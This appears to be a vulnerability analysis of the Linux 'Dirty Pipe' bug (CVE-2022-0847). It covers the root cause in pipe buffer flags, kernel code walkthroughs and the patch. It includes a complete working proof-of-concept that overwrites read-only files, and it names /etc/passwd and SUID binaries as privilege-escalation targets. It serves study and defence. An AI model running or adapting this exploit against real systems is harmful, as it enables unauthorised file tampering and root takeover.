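CVE ID: CVE-2022-0847
Affected Linux versions: 5.8 and later; fixed in 5.16.11, 5.15.25, and 5.10.102.
Root cause: the pipe-related sys_splice implementation leaves pipe_buffer->flags uninitialized, so a page cache page that should only ever be read can be written.
PoC effect: an unprivileged user can write to arbitrary read-only files, bypassing permission checks (limitation: the change does not persist)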
Vulnerability analysis
The vulnerability touches a fair amount of code, so we start the analysis from the PoC.
PoC analysis
```c
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/* Create a pipe in which every pipe_buffer slot has carried
 * PIPE_BUF_FLAG_CAN_MERGE at least once. */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();

    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    static char buffer[4096];

    /* fill the pipe completely; each slot gets the CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }

    /* drain the pipe; the slots are released but their flags stay set */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
        return EXIT_FAILURE;
    }

    const char *const path = argv[1];
    loff_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);

    if (offset % PAGE_SIZE == 0) {
        fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
        return EXIT_FAILURE;
    }

    const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
    const loff_t end_offset = offset + (loff_t)data_size;
    if (end_offset > next_page) {
        fprintf(stderr, "Sorry, cannot write across a page boundary\n");
        return EXIT_FAILURE;
    }

    /* read-only access to the target is sufficient */
    const int fd = open(path, O_RDONLY);
    if (fd < 0) {
        perror("open failed");
        return EXIT_FAILURE;
    }

    struct stat st;
    if (fstat(fd, &st)) {
        perror("stat failed");
        return EXIT_FAILURE;
    }

    if (offset > st.st_size) {
        fprintf(stderr, "Offset is not inside the file\n");
        return EXIT_FAILURE;
    }

    if (end_offset > st.st_size) {
        fprintf(stderr, "Sorry, cannot enlarge the file\n");
        return EXIT_FAILURE;
    }

    int p[2];
    prepare_pipe(p);

    /* splice one byte from just before the target offset into the pipe;
     * this puts a reference to the page cache page into a pipe_buffer */
    --offset;
    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    if (nbytes < 0) {
        perror("splice failed");
        return EXIT_FAILURE;
    }
    if (nbytes == 0) {
        fprintf(stderr, "short splice\n");
        return EXIT_FAILURE;
    }

    /* this write is merged into the page cache page because the
     * stale PIPE_BUF_FLAG_CAN_MERGE flag is still set */
    nbytes = write(p[1], data, data_size);
    if (nbytes < 0) {
        perror("write failed");
        return EXIT_FAILURE;
    }
    if ((size_t)nbytes < data_size) {
        fprintf(stderr, "short write\n");
        return EXIT_FAILURE;
    }

    printf("It worked!\n");
    return EXIT_SUCCESS;
}
```
Mapped onto the kernel, the PoC has three key steps:
The first round of writes to the pipe reaches the following kernel code:
```c
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    /* ... */
    buf = &pipe->bufs[head & mask];
    buf->page = page;
    buf->ops = &anon_pipe_buf_ops;
    buf->offset = 0;
    buf->len = 0;
    if (is_packetized(filp))
        buf->flags = PIPE_BUF_FLAG_PACKET;
    else
        buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
    pipe->tmp_page = NULL;
    /* ... */
}
```
The splice call goes through a fairly long call path, but it eventually reaches this function:
```c
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
                                     struct iov_iter *i)
{
    /* ... */
    buf = &pipe->bufs[i_head & p_mask];
    /* ... */
    buf->ops = &page_cache_pipe_buf_ops;
    get_page(page);
    buf->page = page;
    buf->offset = offset;
    buf->len = bytes;
    /* ... */
}
```
The second write to the pipe then operates on the page cache page from the previous step:
```c
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    /* ... */
    if (chars && !was_empty) {
        /* ... */
        if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
            offset + chars <= PAGE_SIZE) {
            /* ... */
            ret = copy_page_from_iter(buf->page, offset, chars, from);
            /* ... */
        }
    }
    /* ... */
}
```
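Note that the len argument of the splice in step two (bytes in the kernel function) must be at least 1, and the merged write is appended after the spliced data. The spliced byte itself is therefore never overwritten, which is why the PoC refuses to start at a page boundary: the first byte of a page cannot be reached.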
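The offset checks at the top of the PoC can be condensed into one predicate. The following is only a sketch that mirrors those checks; the function name dirtypipe_range_ok and the POC_PAGE_SIZE macro are made up for illustration, and a 4096-byte page is assumed as in the PoC.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define POC_PAGE_SIZE 4096 /* assumed page size, same fallback as the PoC */

/* Hypothetical helper: returns true if the range [offset, offset + len)
 * passes the same checks the PoC applies before calling splice(). */
bool dirtypipe_range_ok(int64_t offset, size_t len, int64_t file_size)
{
    /* The byte before the target is spliced first, so the target
     * cannot be the first byte of a page. */
    if (offset % POC_PAGE_SIZE == 0)
        return false;

    /* The merged write stays inside the spliced page. */
    int64_t next_page = (offset | (POC_PAGE_SIZE - 1)) + 1;
    int64_t end_offset = offset + (int64_t)len;
    if (end_offset > next_page)
        return false;

    /* The file cannot be enlarged this way. */
    if (offset > file_size || end_offset > file_size)
        return false;

    return true;
}
```

For example, with an 8192-byte file, offset 1 with 4095 bytes of data is accepted, while offset 4096 (a page boundary) is rejected regardless of the data length.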
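The detailed kernel code flow of the pipe operations is covered in the next subsection.
Kernel code analysis
At an abstract level, a pipe is just a buffer: one end (fd[0]) reads and the other end (fd[1]) writes.
In the kernel implementation, a pipe is backed by 1 to 16 pages (16 is the default limit). Each page is managed by a struct pipe_buffer, and the 16 struct pipe_buffer entries are in turn managed by a single struct pipe_inode_info. This gives the structure shown in the figure below; the pipe's data actually lives in the physical pages at the bottom layer.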
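A few points became clear while reading the code. Re-reading it later would be time-consuming, so I am writing them down here. When data is written to a pipe:
If the pipe was created without O_DIRECT in flags, pipe_buffer->flags is set to PIPE_BUF_FLAG_CAN_MERGE. Data from several consecutive writes can then be merged by the kernel into a single page (provided the combined length is <= one PAGE_SIZE).
If the pipe was created with O_DIRECT in flags, each write occupies its own page (whether or not it fills the page) and is not merged with the writes before or after it.
Reads behave the same way: without O_DIRECT, a page is released only once all of its contents have been read; with O_DIRECT, the buffer is released after a read no matter how much was read.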
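When write() writes to a pipe, each pipe_buffer holds at most one PAGE_SIZE (4096 bytes) of data; a larger write is split across several buffers, one page per iteration of the write loop.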
A pipe can hold at most 16*4096=65536 bytes (by default; the limit can be changed with fcntl()). Any further write blocks until someone reads data out.
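The capacity and the O_DIRECT (packet mode) behavior described above can be observed from user space. The sketch below is illustrative only: the function names are made up, and it assumes a Linux system where pipe2() accepts O_DIRECT. On such a system, the first read after writing "ab" and then "cd" is expected to return 4 bytes for a normal pipe (the writes were merged into one buffer) and 2 bytes in packet mode (one write per buffer).

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

/* Returns the pipe capacity in bytes as reported by F_GETPIPE_SZ,
 * or -1 on error. */
int demo_pipe_capacity(void)
{
    int p[2];
    if (pipe(p))
        return -1;
    int size = fcntl(p[1], F_GETPIPE_SZ);
    close(p[0]);
    close(p[1]);
    return size;
}

/* Writes "ab" and then "cd" to a new pipe and returns how many bytes the
 * first read() yields, or -1 on error. pipe_flags is passed to pipe2():
 * 0 for a normal pipe, O_DIRECT for packet mode. */
long demo_first_read_len(int pipe_flags)
{
    int p[2];
    char buf[16];
    long n = -1;

    if (pipe2(p, pipe_flags))
        return -1;
    if (write(p[1], "ab", 2) == 2 && write(p[1], "cd", 2) == 2)
        n = (long)read(p[0], buf, sizeof(buf));
    close(p[0]);
    close(p[1]);
    return n;
}
```

Calling demo_first_read_len(0) and demo_first_read_len(O_DIRECT) side by side shows the difference between merged and packetized buffers.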
Creating a pipe
Creating a pipe allocates two main structures: struct pipe_inode_info and struct pipe_buffer.
```c
#define PIPE_DEF_BUFFERS 16

struct pipe_inode_info *alloc_pipe_info(void)
{
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
    /* ... */
    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
    /* ... */
    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
                         GFP_KERNEL_ACCOUNT);
    /* ... */
}
```
The members of struct pipe_inode_info (Linux 5.15) have the following meanings:
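```c
struct pipe_inode_info {
    struct mutex mutex;                   /* protects the whole structure */
    wait_queue_head_t rd_wait, wr_wait;   /* readers wait on empty, writers on full */
    unsigned int head;                    /* point of buffer production */
    unsigned int tail;                    /* point of buffer consumption */
    unsigned int max_usage;               /* max number of ring slots that may be used */
    unsigned int ring_size;               /* total number of buffers (power of 2) */
#ifdef CONFIG_WATCH_QUEUE
    bool note_loss;                       /* next read() should report lost data */
#endif
    unsigned int nr_accounted;            /* amount accounted in user->pipe_bufs */
    unsigned int readers;                 /* number of current readers */
    unsigned int writers;                 /* number of current writers */
    unsigned int files;                   /* number of struct file referring to this pipe */
    unsigned int r_counter;               /* reader counter */
    unsigned int w_counter;               /* writer counter */
    unsigned int poll_usage;              /* is this pipe used for epoll? */
    struct page *tmp_page;                /* cached released page */
    struct fasync_struct *fasync_readers; /* reader side fasync */
    struct fasync_struct *fasync_writers; /* writer side fasync */
    struct pipe_buffer *bufs;             /* the circular array of pipe buffers */
    struct user_struct *user;             /* the user who created this pipe */
#ifdef CONFIG_WATCH_QUEUE
    struct watch_queue *watch_queue;      /* set if this pipe is a watch queue */
#endif
};
```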
The members of struct pipe_buffer (Linux 5.15) have the following meanings:
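```c
struct pipe_buffer {
    struct page *page;                    /* page holding the buffer's data */
    unsigned int offset, len;             /* offset and length of the data inside the page */
    const struct pipe_buf_operations *ops; /* operations associated with this buffer */
    unsigned int flags;                   /* pipe buffer flags, e.g. PIPE_BUF_FLAG_CAN_MERGE */
    unsigned long private;                /* private data owned by the ops */
};
```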
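The head and tail members are free-running counters, and a slot in bufs is selected by masking a counter with ring_size - 1. The sketch below models that arithmetic in user space. The ring_* names are my own and only modeled on the kernel's pipe_empty()/pipe_full() helpers; this is not kernel code.

```c
#include <stdbool.h>

/* The ring is empty when producer and consumer counters are equal. */
bool ring_empty(unsigned int head, unsigned int tail)
{
    return head == tail;
}

/* Number of occupied slots; unsigned wraparound keeps the
 * subtraction correct even after the counters overflow. */
unsigned int ring_occupancy(unsigned int head, unsigned int tail)
{
    return head - tail;
}

/* The ring is full when the occupancy reaches the usage limit. */
bool ring_full(unsigned int head, unsigned int tail, unsigned int limit)
{
    return ring_occupancy(head, tail) >= limit;
}

/* Maps a counter to a slot index; ring_size must be a power of two. */
unsigned int ring_slot(unsigned int counter, unsigned int ring_size)
{
    return counter & (ring_size - 1);
}
```

With ring_size 16, counter 17 maps to slot 1, so the 17th buffer reuses the slot that the 1st buffer occupied. This reuse of slots is what the PoC's fill-and-drain step relies on.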
Writing to a pipe
```c
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    struct file *filp = iocb->ki_filp;
    struct pipe_inode_info *pipe = filp->private_data;
    size_t total_len = iov_iter_count(from);
    ssize_t chars;
    /* ... */

    head = pipe->head;
    was_empty = pipe_empty(head, pipe->tail);
    chars = total_len & (PAGE_SIZE-1);
    /* Try to append the sub-page remainder to the last buffer first. */
    if (chars && !was_empty) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
        int offset = buf->offset + buf->len;

        if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
            offset + chars <= PAGE_SIZE) {
            /* ... */
            ret = copy_page_from_iter(buf->page, offset, chars, from);
            /* ... */
            buf->len += ret;
            if (!iov_iter_count(from))
                goto out;
        }
    }

    /* Copy the rest into new buffers, one page per iteration. */
    for (;;) {
        /* ... */
        head = pipe->head;
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
            unsigned int mask = pipe->ring_size - 1;
            struct pipe_buffer *buf = &pipe->bufs[head & mask];
            struct page *page = pipe->tmp_page;
            int copied;

            if (!page) {
                page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
                /* ... */
            }
            /* ... */
            pipe->head = head + 1;
            /* ... */

            /* Insert the page into the buffer array. */
            buf = &pipe->bufs[head & mask];
            buf->page = page;
            buf->ops = &anon_pipe_buf_ops;
            buf->offset = 0;
            buf->len = 0;
            if (is_packetized(filp))
                buf->flags = PIPE_BUF_FLAG_PACKET;
            else
                buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            pipe->tmp_page = NULL;

            copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
            /* ... */
            ret += copied;
            buf->offset = 0;
            buf->len = copied;

            if (!iov_iter_count(from))
                break;
        }
        /* ... */
    }
out:
    if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
        wake_next_writer = false;
    /* ... */
    if (was_empty || pipe->poll_usage)
        wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
    kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
    if (wake_next_writer)
        wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
    /* ... */
    return ret;
}
```
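The merge decision at the top of pipe_write() is pure arithmetic, so it can be modeled in isolation. The sketch below is a user-space model under my own assumptions: the function name is made up, and MERGE_FLAG_CAN_MERGE is an illustrative stand-in for PIPE_BUF_FLAG_CAN_MERGE rather than a value taken from the kernel headers.

```c
#include <stddef.h>

#define MERGE_PAGE_SIZE 4096u
#define MERGE_FLAG_CAN_MERGE 0x10u /* illustrative value only */

/* Returns how many bytes pipe_write() would try to append to the page of
 * the most recently filled buffer, or 0 if no merge is attempted. */
size_t demo_merge_bytes(unsigned int last_flags, unsigned int last_offset,
                        unsigned int last_len, size_t total_len,
                        int was_empty)
{
    /* Only the sub-page remainder of the write is a merge candidate. */
    size_t chars = total_len & (MERGE_PAGE_SIZE - 1);
    if (!chars || was_empty)
        return 0;

    /* First free byte inside the last buffer's page. */
    size_t offset = (size_t)last_offset + last_len;

    if ((last_flags & MERGE_FLAG_CAN_MERGE) &&
        offset + chars <= MERGE_PAGE_SIZE)
        return chars;
    return 0;
}
```

In the PoC's situation the last buffer holds one spliced byte, so demo_merge_bytes(MERGE_FLAG_CAN_MERGE, 0, 1, 5, 0) yields 5, while the same call with flags 0 yields 0. The flag alone decides whether the write lands in the existing page.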
Reading from a pipe
```c
static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
    size_t total_len = iov_iter_count(to);
    struct file *filp = iocb->ki_filp;
    struct pipe_inode_info *pipe = filp->private_data;
    /* ... */

    was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
    for (;;) {
        unsigned int head = pipe->head;
        unsigned int tail = pipe->tail;
        unsigned int mask = pipe->ring_size - 1;

        if (!pipe_empty(head, tail)) {
            struct pipe_buffer *buf = &pipe->bufs[tail & mask];
            size_t chars = buf->len;

            if (chars > total_len) {
                /* ... */
                chars = total_len;
            }

            written = copy_page_to_iter(buf->page, buf->offset, chars, to);
            /* ... */
            ret += chars;
            buf->offset += chars;
            buf->len -= chars;

            /* Release the buffer once all of its data has been read. */
            if (!buf->len) {
                pipe_buf_release(pipe, buf);
                /* ... */
                tail++;
                pipe->tail = tail;
            }
            total_len -= chars;
            if (!total_len)
                break;
            if (!pipe_empty(head, tail))
                continue;
        }
        /* ... */
    }
    if (pipe_empty(pipe->head, pipe->tail))
        wake_next_reader = false;
    __pipe_unlock(pipe);

    if (was_full)
        wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
    if (wake_next_reader)
        wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
    /* ... */
    return ret;
}
```
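In addition, pipe_buf_release() contains an optimization: when the page used by a pipe_buffer has only one reference and pipe_inode_info->tmp_page is empty, the page is stashed in tmp_page. The next write that needs a fresh page can then reuse it instead of allocating a new one.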
```c
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
                                    struct pipe_buffer *buf)
{
    const struct pipe_buf_operations *ops = buf->ops;

    buf->ops = NULL;
    ops->release(pipe, buf);
}

static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
                                  struct pipe_buffer *buf)
{
    struct page *page = buf->page;

    if (page_count(page) == 1 && !pipe->tmp_page)
        pipe->tmp_page = page;
    else
        put_page(page);
}
```
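The tmp_page caching can be modeled with two tiny functions. This is a simplified user-space sketch, not kernel code: the tmp_demo_* types and functions are hypothetical, and a plain integer stands in for the page reference count.

```c
#include <stddef.h>

struct tmp_demo_page { int refcount; };
struct tmp_demo_pipe { struct tmp_demo_page *tmp_page; };

/* Models anon_pipe_buf_release(): keep the page as a spare if the pipe
 * holds the only reference and no spare is cached yet; otherwise drop
 * the reference. */
void tmp_demo_release(struct tmp_demo_pipe *pipe, struct tmp_demo_page *page)
{
    if (page->refcount == 1 && !pipe->tmp_page)
        pipe->tmp_page = page;
    else
        page->refcount--;
}

/* Models the start of the write loop: take the spare page if there is
 * one. A NULL result means the caller would have to allocate a page. */
struct tmp_demo_page *tmp_demo_take_spare(struct tmp_demo_pipe *pipe)
{
    struct tmp_demo_page *page = pipe->tmp_page;
    pipe->tmp_page = NULL;
    return page;
}
```

Releasing two singly referenced pages in a row caches only the first one; the second is simply dropped, matching the single-slot nature of tmp_page.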
The splice operation
The kernel call path of splice is as follows:
```c
SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
                int, fd_out, loff_t __user *, off_out,
                size_t, len, unsigned int, flags);
    __do_splice(in.file, off_in, out.file, off_out, len, flags);
        do_splice(in, __off_in, out, __off_out, len, flags);
```
do_splice() distinguishes three cases:
```c
long do_splice(struct file *in, loff_t *off_in, struct file *out,
               loff_t *off_out, size_t len, unsigned int flags)
{
    /* ... */
    ipipe = get_pipe_info(in, true);
    opipe = get_pipe_info(out, true);

    /* case 1: pipe to pipe */
    if (ipipe && opipe) {
        /* ... */
        return splice_pipe_to_pipe(ipipe, opipe, len, flags);
    }

    /* case 2: pipe to file */
    if (ipipe) {
        /* ... */
        ret = do_splice_from(ipipe, out, &offset, len, flags);
        /* ... */
        if (!off_out)
            out->f_pos = offset;
        else
            *off_out = offset;

        return ret;
    }

    /* case 3: file to pipe */
    if (opipe) {
        /* ... */
        if (off_in) {
            if (!(in->f_mode & FMODE_PREAD))
                return -EINVAL;
            offset = *off_in;
        } else {
            offset = in->f_pos;
        }
        /* ... */
        ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
        if (!off_in)
            in->f_pos = offset;
        else
            *off_in = offset;

        return ret;
    }
    /* ... */
}
```
Here we only need to look at the last case, where out is a pipe, i.e. the call path of splice_file_to_pipe():
```c
splice_file_to_pipe(in, opipe, &offset, len, flags);
    do_splice_to(in, offset, opipe, len, flags);
        in->f_op->splice_read(in, ppos, pipe, len, flags);
```
Debugging with vscode + gdb shows that in->f_op->splice_read resolves to generic_file_splice_read():
```c
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
                                 struct pipe_inode_info *pipe, size_t len,
                                 unsigned int flags)
{
    /* ... */
    iov_iter_pipe(&to, READ, pipe, len);
    init_sync_kiocb(&kiocb, in);
    kiocb.ki_pos = *ppos;
    ret = call_read_iter(in, &kiocb, &to);
    /* ... */
    return ret;
}

static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio,
                                     struct iov_iter *iter)
{
    return file->f_op->read_iter(kio, iter);
}
```
file->f_op->read_iter resolves to generic_file_read_iter():
```c
ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    /* ... */
    return filemap_read(iocb, iter, retval);
}
```
This in turn calls filemap_read():
```c
ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
                     ssize_t already_read)
{
    struct file *filp = iocb->ki_filp;
    struct file_ra_state *ra = &filp->f_ra;
    struct address_space *mapping = filp->f_mapping;
    struct inode *inode = mapping->host;
    /* ... */

    iov_iter_truncate(iter, inode->i_sb->s_maxbytes);
    pagevec_init(&pvec);

    do {
        /* ... */
        error = filemap_get_pages(iocb, iter, &pvec);
        /* ... */
        isize = i_size_read(inode);
        /* ... */
        end_offset = min_t(loff_t, isize, iocb->ki_pos + iter->count);
        /* ... */
        for (i = 0; i < pagevec_count(&pvec); i++) {
            struct page *page = pvec.pages[i];
            size_t page_size = thp_size(page);
            size_t offset = iocb->ki_pos & (page_size - 1);
            size_t bytes = min_t(loff_t, end_offset - iocb->ki_pos,
                                 page_size - offset);
            /* ... */
            copied = copy_page_to_iter(page, offset, bytes, iter);

            already_read += copied;
            iocb->ki_pos += copied;
            /* ... */
        }
        /* ... */
    } while (iov_iter_count(iter) && iocb->ki_pos < isize && !error);
    /* ... */
    return already_read ? already_read : error;
}
```
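The offset and bytes values computed in the inner loop determine what ends up in pipe_buffer->offset and pipe_buffer->len. The following sketch reproduces that arithmetic for the first page of a read. It assumes ordinary 4096-byte pages (no huge pages) and a read position inside the file; the struct and function names are made up for illustration.

```c
#include <stdint.h>

#define READ_PAGE_SIZE 4096u /* assumes thp_size(page) == 4096 */

struct read_demo_chunk {
    uint64_t offset; /* offset of the data inside the page */
    uint64_t bytes;  /* number of bytes taken from that page */
};

/* For a read of count bytes at file position pos (pos < isize), returns
 * the in-page offset and length passed to copy_page_to_iter() for the
 * first page. */
struct read_demo_chunk read_demo_first_chunk(uint64_t pos, uint64_t count,
                                             uint64_t isize)
{
    struct read_demo_chunk c;
    uint64_t end_offset = pos + count < isize ? pos + count : isize;
    uint64_t remaining = end_offset - pos;

    c.offset = pos & (READ_PAGE_SIZE - 1);
    uint64_t in_page = READ_PAGE_SIZE - c.offset;
    c.bytes = remaining < in_page ? remaining : in_page;
    return c;
}
```

For a PoC run targeting file offset 4100, the splice starts at position 4099 with a length of 1, which gives offset 3 and bytes 1. The later write is then merged at in-page offset 4, which is exactly the target.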
Next, let's look at filemap_get_pages() and copy_page_to_iter() in turn.
First, filemap_get_pages():
```c
static int filemap_get_pages(struct kiocb *iocb, struct iov_iter *iter,
                             struct pagevec *pvec)
{
    struct file *filp = iocb->ki_filp;
    struct address_space *mapping = filp->f_mapping;
    pgoff_t index = iocb->ki_pos >> PAGE_SHIFT;
    /* ... */

    last_index = DIV_ROUND_UP(iocb->ki_pos + iter->count, PAGE_SIZE);
retry:
    /* ... */
    filemap_get_read_batch(mapping, index, last_index, pvec);
    if (!pagevec_count(pvec)) {
        /* ... */
        page_cache_sync_readahead(mapping, ra, filp, index,
                                  last_index - index);
        filemap_get_read_batch(mapping, index, last_index, pvec);
    }
    if (!pagevec_count(pvec)) {
        /* ... */
        err = filemap_create_page(filp, mapping,
                                  iocb->ki_pos >> PAGE_SHIFT, pvec);
        if (err == AOP_TRUNCATED_PAGE)
            goto retry;
        return err;
    }
    /* ... */
    return err;
}
```
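The page range looked up in the page cache follows directly from the file position and the requested length. A small sketch of that index arithmetic, assuming a 4096-byte page (PAGE_SHIFT of 12); the idx_demo_* names are hypothetical:

```c
#include <stdint.h>

#define IDX_PAGE_SHIFT 12
#define IDX_PAGE_SIZE (1ull << IDX_PAGE_SHIFT)

/* Index of the page that contains file position pos. */
uint64_t idx_demo_first(uint64_t pos)
{
    return pos >> IDX_PAGE_SHIFT;
}

/* DIV_ROUND_UP(pos + count, PAGE_SIZE): one past the index of the last
 * page touched by a read of count bytes starting at pos. */
uint64_t idx_demo_last(uint64_t pos, uint64_t count)
{
    return (pos + count + IDX_PAGE_SIZE - 1) / IDX_PAGE_SIZE;
}
```

A one-byte splice at position 4099 gives index 1 and last_index 2, so only the second page of the file is involved.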
Then copy_page_to_iter():
```c
/* call path */
copy_page_to_iter(page, offset, bytes, iter);
    __copy_page_to_iter(page, offset,
                        min(bytes, (size_t)PAGE_SIZE - offset), i);

static size_t __copy_page_to_iter(struct page *page, size_t offset, size_t bytes,
                                  struct iov_iter *i)
{
    /* ... */
    if (iov_iter_is_pipe(i))
        return copy_page_to_iter_pipe(page, offset, bytes, i);
    /* ... */
    return 0;
}

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
                                     struct iov_iter *i)
{
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;

    if (unlikely(bytes > i->count))
        bytes = i->count;

    if (unlikely(!bytes))
        return 0;
    /* ... (buf is pointed at &pipe->bufs[i_head & p_mask]) ... */

    buf->ops = &page_cache_pipe_buf_ops;
    get_page(page);
    buf->page = page;
    buf->offset = offset;
    buf->len = bytes;
    /* ... */
    i->count -= bytes;
    return bytes;
}
```
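In short, splice hands the page cache page directly to pipe_buffer->page. This avoids the back-and-forth copying that a user-space program would need to read the file and write it to the pipe, which improves efficiency. See the figure below:
Normally, without the PIPE_BUF_FLAG_CAN_MERGE flag, the page this pipe_buffer points to is only ever read and cannot be written to.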
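However, copy_page_to_iter_pipe() forgets to initialize buf->flags and implicitly assumes it is 0. A recycled slot may still carry PIPE_BUF_FLAG_CAN_MERGE from an earlier pipe_write(), and that is what causes the vulnerability.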
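The whole sequence (fill, drain, splice, check) can be replayed on a toy ring to see why the stale flag matters. This is a simplified user-space simulation under my own assumptions, not kernel code: all sim_* names are hypothetical, SIM_CAN_MERGE is an illustrative flag value, and the patched parameter stands for the one-line fix that resets flags.

```c
#include <stdbool.h>

#define SIM_RING 16
#define SIM_CAN_MERGE 0x10u /* illustrative flag value */

enum sim_ops { SIM_OPS_NONE, SIM_OPS_ANON, SIM_OPS_PAGE_CACHE };

struct sim_buf { enum sim_ops ops; unsigned int flags; };
struct sim_ring { struct sim_buf bufs[SIM_RING]; unsigned int head, tail; };

/* pipe_write() path: a new anonymous buffer, flags set explicitly. */
void sim_write_slot(struct sim_ring *r)
{
    struct sim_buf *b = &r->bufs[r->head++ & (SIM_RING - 1)];
    b->ops = SIM_OPS_ANON;
    b->flags = SIM_CAN_MERGE;
}

/* pipe_read() path: the slot is released, its flags are left untouched. */
void sim_read_slot(struct sim_ring *r)
{
    r->bufs[r->tail++ & (SIM_RING - 1)].ops = SIM_OPS_NONE;
}

/* copy_page_to_iter_pipe() path; patched adds the missing flags reset. */
void sim_splice_slot(struct sim_ring *r, bool patched)
{
    struct sim_buf *b = &r->bufs[r->head++ & (SIM_RING - 1)];
    b->ops = SIM_OPS_PAGE_CACHE;
    if (patched)
        b->flags = 0;
}

/* Replays the PoC steps and reports whether the page cache buffer ends
 * up looking mergeable to the next pipe_write(). */
bool sim_page_cache_writable(bool patched)
{
    struct sim_ring r = { .head = 0, .tail = 0 };

    for (int i = 0; i < SIM_RING; i++)
        sim_write_slot(&r);              /* fill the pipe */
    for (int i = 0; i < SIM_RING; i++)
        sim_read_slot(&r);               /* drain the pipe */
    sim_splice_slot(&r, patched);        /* splice one page in */

    const struct sim_buf *last = &r.bufs[(r.head - 1) & (SIM_RING - 1)];
    return last->ops == SIM_OPS_PAGE_CACHE &&
           (last->flags & SIM_CAN_MERGE) != 0;
}
```

In this model sim_page_cache_writable(false) is true and sim_page_cache_writable(true) is false, which is the entire difference the flags reset makes.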
The fix
patch: lib/iov_iter: initialize "flags" in new pipe_buffer
```diff
 lib/iov_iter.c | 2 ++
 1 file changed, 2 insertions(+)

@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
         return 0;

     buf->ops = &page_cache_pipe_buf_ops;
+    buf->flags = 0;
     get_page(page);
     buf->page = page;
     buf->offset = offset;
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
             break;

         buf->ops = &default_pipe_buf_ops;
+        buf->flags = 0;
         buf->page = page;
         buf->offset = 0;
         buf->len = min_t(ssize_t, left, PAGE_SIZE);
```
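Besides copy_page_to_iter_pipe(), which the PoC exercises, the patch also initializes pipe_buffer->flags in push_pipe().
(A two-line patch as simple as the one for Dirty COW, and like Dirty COW it allows writing to arbitrary read-only files. These two bugs are remarkably powerful.)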
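Exploitation
PoC verification
Verifying the PoC is straightforward: with a Linux 5.15 environment set up in QEMU, it produced a result quickly. In this respect it is easier to use than Dirty COW because no race has to be won; unfortunately, not many kernel versions are vulnerable to Dirty Pipe.
Two minor flaws:
The first byte of a page cannot be overwritten.
The change does not persist. Dirty Pipe only modifies the contents of the page cache, so after a reboot the file is back in its unmodified state. The change is written back to disk only if some other process with write permission modifies the file and marks the page dirty. Even so, this is enough for privilege escalation.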
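Privilege escalation
On x86 Linux, further privilege escalation works much like it does with Dirty COW: pick a special file such as /etc/passwd, an executable with the SUID bit set, or a shared library, and use Dirty Pipe to modify its contents.
The PoC already provides the main framework and the remaining work is somewhat repetitive, so I am skipping it for now and may add it later if needed.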
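Background
pipe
A pipe is a unidirectional data channel used for inter-process communication.
On Linux, two system calls create a pipe: pipe and pipe2. The only difference is that pipe2 takes an additional flags argument (with flags set to 0, pipe2 is equivalent to pipe). The corresponding libc wrappers are declared as follows: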
```c
#include <unistd.h>

int pipe(int pipefd[2]);

#define _GNU_SOURCE     /* required for pipe2() */
#include <fcntl.h>      /* Definition of O_* constants */
#include <unistd.h>

int pipe2(int pipefd[2], int flags);
```
